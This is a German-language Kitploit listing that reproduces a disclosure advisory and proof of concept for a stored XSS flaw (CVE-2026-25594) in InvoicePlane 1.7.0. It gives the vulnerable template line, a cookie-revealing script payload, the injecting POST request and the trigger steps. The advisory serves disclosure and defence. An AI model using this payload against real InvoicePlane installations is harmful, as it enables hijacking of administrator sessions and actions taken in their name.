Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-25594 — # Proof-of-Concept für gespeichertes XSS in InvoicePlane 1.7.0 über das Feld für den Familiennamen, einschließlich Payload, Request und Auswirkungsanalyse für defensive Forschung. | Kitploit
Tools/GitHubGitHub/lagathos/cve-2026-25594
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitLernen & Bildung
GitHublagathos/cve-2026-25594

CVE-2026-25594

# Proof-of-Concept für gespeichertes XSS in InvoicePlane 1.7.0 über das Feld für den Familiennamen, einschließlich Payload, Request und Auswirkungsanalyse für defensive Forschung.

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-25594 — Stored XSS über den Familiennamen in InvoicePlane 1.7.0

Schwachstelle: Stored Cross-Site Scripting (XSS) über das Feld „Familienname“

Produkt: InvoicePlane

Betroffene Version: 1.7.0 (und vermutlich frühere Versionen)

Schweregrad: Mittel

CVSS 3.1-Score: 4.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)

CWE: CWE-79: Unzureichende Neutralisierung von Eingaben bei der Erzeugung von Webseiten

Entdeckt von: Leonidas Agathos

Meldedatum: 2026-01-31


Beschreibung

Das Feld family_name im Produktfamilien-Formular (/index.php/families/form) akzeptiert beliebige Eingaben ohne Bereinigung. Der Wert wird in der Datenbank gespeichert und später unkodiert im Familien-Dropdown der Produkterstellungs-/Bearbeitungsseite gerendert, was zur Ausführung von JavaScript führt, sobald ein Administrator das Produktformular besucht.

Betroffene Datei: application/modules/products/views/form.php:40

root@kitploit:~
// Zeile 40
><?php echo $family->family_name; ?></option>

Proof of Concept

Schritt 1 — Payload in den Familiennamen injizieren

Navigieren Sie zu /index.php/families/form und übermitteln Sie Folgendes als Familiennamen:

root@kitploit:~
<script>alert('domain:'+document.domain+'cookies:'+document.cookie)</script>

Anfrage:

root@kitploit:~
POST /index.php/families/form HTTP/1.1
Host: 172.25.0.12
Content-Type: application/x-www-form-urlencoded

_ip_csrf=...&btn_submit=1&is_update=0&family_name=%3Cscript%3Ealert%28document.cookies%29%3C%2Fscript%3E

Schritt 1 - Injizieren der XSS-Payload in das Feld „Familienname“ über Burp Suite

Schritt 2 — XSS auslösen

Navigieren Sie zu /index.php/products/form. Die Payload wird ausgelöst, sobald das Familien-Dropdown gerendert wird.

Schritt 2 - XSS wird auf der Produktformular-Seite ausgeführt und gibt Domain und Cookies preis


Auswirkungen

Jeder Administrator, der die Produkterstellungs- oder Bearbeitungsseite besucht, erlebt die Ausführung der Payload in seinem Browser. Dies ermöglicht Session-Hijacking (falls Cookies nicht HttpOnly sind), den Diebstahl von CSRF-Tokens sowie Aktionen, die unter der Identität des Opfers ausgeführt werden.


Zeitplan

DatumEreignis
2026-01-30Schwachstelle entdeckt
2026-01-31Proof of Concept entwickelt
2026-01-31Hersteller benachrichtigt
2026-02-04Bestätigung durch den Hersteller
2026-02-04Patch veröffentlicht
2026-02-05Öffentliche Offenlegung

Referenzen

  • CWE-79
  • OWASP: Cross-Site Scripting (XSS)
  • CVE-2026-25594

Haftungsausschluss

Diese Schwachstelle wurde im Rahmen unabhängiger Sicherheitsforschung entdeckt. Alle Informationen werden ausschließlich zu Bildungs-, Forschungs- und Verteidigungszwecken bereitgestellt, um dem Hersteller und der Sicherheitsgemeinschaft beim Verständnis und der Behebung des Problems zu helfen. Jegliche böswillige Nutzung dieser Informationen ist strengstens untersagt.

Tool herunterladen